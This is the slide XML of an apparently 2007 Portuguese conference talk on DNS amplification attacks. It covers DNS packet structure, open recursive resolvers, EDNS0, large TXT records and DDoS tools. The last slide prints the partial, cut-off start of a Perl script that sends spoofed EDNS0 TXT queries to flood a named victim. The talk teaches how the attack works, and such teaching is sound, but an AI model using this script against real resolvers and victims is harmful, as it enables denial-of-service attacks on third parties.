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9" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="271" r:id="rId23"/>
    <p:sldId id="273" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>
    <p:sldId id="275" r:id="rId2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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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0DA6-47D7-499F-B7A5-83CA19A752D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7B104-1C13-43B4-BC1E-6E487EDF1A2C}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:pPr/>
              <a:t>28/10/2007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00DA6-47D7-499F-B7A5-83CA19A752D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nsstuff.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.squish.net/dnscheck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ert.br/docs/whitepapers/dns-recursivo-aberto/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.isotf.org/news/DNS-Amplification-Attacks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hyperlink" Target="http://hostinet.com/noticiashosting/33/ataques-ddos-con-servidores-dns-recursivos.html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BR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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Amplification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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BR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3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackers To Hackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fourth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edition</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF00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85786" y="4429132"/>
            <a:ext cx="7786742" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bruno Gonçalves de Oliveira </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.k.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a mphx2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;bruno.at.bsdmail.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2400" b="1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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="1357298"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.quem sou eu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28596" y="2643182"/>
            <a:ext cx="8229600" cy="4525963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estudante de Eng. Computação</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr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pen-tester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  <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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onsultor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r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ecurity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officer</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r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uçador</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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buNone/>
            </a:pP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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="92867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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.protocolo DNS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28596" y="2143116"/>
            <a:ext cx="8229600" cy="4525963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ropriedade dos pacotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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| HEADER |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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e Contadores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Question</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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|</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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Pergunta ao servidor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Answer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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RRs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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com resposta a pergunta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Authority</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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| </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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RRs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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indicando autoridade sobre a pergunta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-B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| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2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Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="18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RRs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-B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contendo informações adicionais</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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0034" y="114298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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.UDP 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0034" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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recisa dizer alguma coisa?!  =)</a:t>
            </a:r>
          </a:p>
          <a:p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no </a:t>
            </a:r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three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way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hand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shake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!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="114298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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.atuais vulnerabilidades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28596" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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ache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poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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pt-BR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</a:t>
            </a:r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poof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id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r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equests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flood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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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0034" y="1214422"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.tipos de servidores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28596" y="2500306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autoritativos</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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buNone/>
            </a:pP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	 donos da zona de domínio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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	 não devem armazenar </a:t>
            </a:r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cache</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Recursivos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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não DEVERIAM responder a consultas externas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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pt-BR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	resolução de outros domínios por recursividade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-B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buNone/>
            </a:pP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	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-B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buNone/>
            </a:pP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Imagem 4" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="92867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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.funcionamento da recursividade</a:t>
            </a:r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2143116"/>
            <a:ext cx="5743575" cy="450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Imagem 4" descr="h2h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357166"/>
            <a:ext cx="2276475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596" y="1214422"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>let’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!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28596" y="2714620"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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anipulação de hosts</a:t>
            </a:r>
          </a:p>
          <a:p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ervidor a ser consultado</a:t>
            </a:r>
          </a:p>
          <a:p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ervidores recursivos abertos a consulta</a:t>
            </a:r>
          </a:p>
          <a:p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código-fonte</a:t>
            </a:r>
          </a:p>
          <a:p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DNS </a:t>
            </a:r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tools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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="100010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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.manipulação de hosts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28596" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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DDoS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– </a:t>
            </a:r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Distributed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Denial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of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Service</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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árias origens e uma só vítima</a:t>
            </a:r>
          </a:p>
          <a:p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manipulação de </a:t>
            </a:r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zombies</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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Ferramentas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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trin00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pt-BR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tfn2k</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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 </a:t>
            </a:r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lot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of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stuffs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!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="1428736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pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.servidor a ser consultado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28596" y="2571744"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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anipulado pelo atacante</a:t>
            </a:r>
          </a:p>
          <a:p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rande TXT </a:t>
            </a:r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record</a:t>
            </a:r>
            <a:endParaRPr lang="pt-B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EDNS0 - </a:t>
            </a:r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Extensions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Mechanisms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For DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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Imagem 4" descr="h2h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57166"/>
            <a:ext cx="2276475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7158" y="928670"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.grande TXT (exemplo)</a:t>
            </a:r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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="60960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14282" y="1714488"/>
            <a:ext cx="10072758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1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pt-BR" sz="105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;; QUESTION SECTION:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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;teste.h2hc.org.br.		IN	TXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="pt-BR" sz="105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pt-BR" sz="105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;; ANSWER SECTION:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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teste.h2hc.org.br.	3600	IN	TXT	"........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "......................................................................................................................................................." "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "......................................................................................................................................................." "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" "........................................................................................................................................................................................................................................" ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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time: 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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msec</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="105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pt-BR" sz="105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;; SERVER: 10.28.34.251#53(10.28.34.251)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="105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;; WHEN: Fri Oct 19 09:32:48 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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;; MSG SIZE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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rcvd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="105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: 3847</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="10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pt-BR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr 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0034" y="1142984"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.pseudo RR OPT in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="6096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2643182"/>
            <a:ext cx="4286280" cy="2941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596" y="1000108"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.servidores recursivos abertos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28596" y="2332037"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r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lood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de requisições</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r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poof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de source </a:t>
            </a:r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address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dos pacotes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Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475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596" y="928670"/>
            <a:ext cx="8229600" cy="1143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!!</a:t>
            </a:r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4" name="Imagem 3" descr="h2h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57166"/>
            <a:ext cx="2276475" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 4" descr="dns-amp-att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2143116"/>
            <a:ext cx="8773958" cy="37170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143000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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.dono da façanha (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source-code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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643174" y="1214422"/>
            <a:ext cx="8229600" cy="5000636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p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# original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dnsflood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created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by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Yevgeny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V.Yourkhov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#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modified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by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mphx2 for H2HC - Hackers to Hackers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Conference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–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Fourth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Edition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# DNS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Amplification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Attack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Demonstration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#!/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usr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bin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perl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use Net::DNS::Resolver;</a:t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use Net::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RawIP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;</a:t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use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strict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;</a:t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if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($ARGV[0]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eq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'') {</a:t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print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"DNS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Amplication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Attack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Demonstration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\n";</a:t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print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"H2HC - Hackers to Hackers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Conference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Fourth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Edition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(mphx2)\n\n";  </a:t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print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"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Usage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dnsamp_mphx2.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&lt;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recursive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dns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 &lt;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domain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to resolve&gt; &lt;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victim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&gt;\n";        </a:t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exit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(0);</a:t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}</a:t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print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("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abused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$ARGV[0]...\n"); </a:t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my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$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name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;</a:t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my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$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src_ip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;</a:t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for (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my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$i=0; $i &lt; 256; $i++) {</a:t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if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($i&gt;60) {                        </a:t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$i = 0;</a:t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}</a:t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$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name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= $ARGV[1];                         #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server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with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big TXT for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response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$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src_ip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= $ARGV[2];   		      #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our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victim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#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Make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DNS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packet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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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3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my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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dnspacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Net::DNS::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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“TXT”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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my</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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$rr2 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Net::DNS::RR(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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=&gt; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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=&gt; "OPT",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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=&gt; 4096</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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   );                      #use EDNS0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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4kb for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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response</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="3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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR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   $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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dnspacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="3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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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pt-BR" sz="3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additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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=&gt;$rr2);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my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$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dnsdata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= $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dnspacket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-&gt;data;</a:t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my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$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sock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=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new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Net::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RawIP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({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udp</a:t>
            </a:r>
            <a:r>
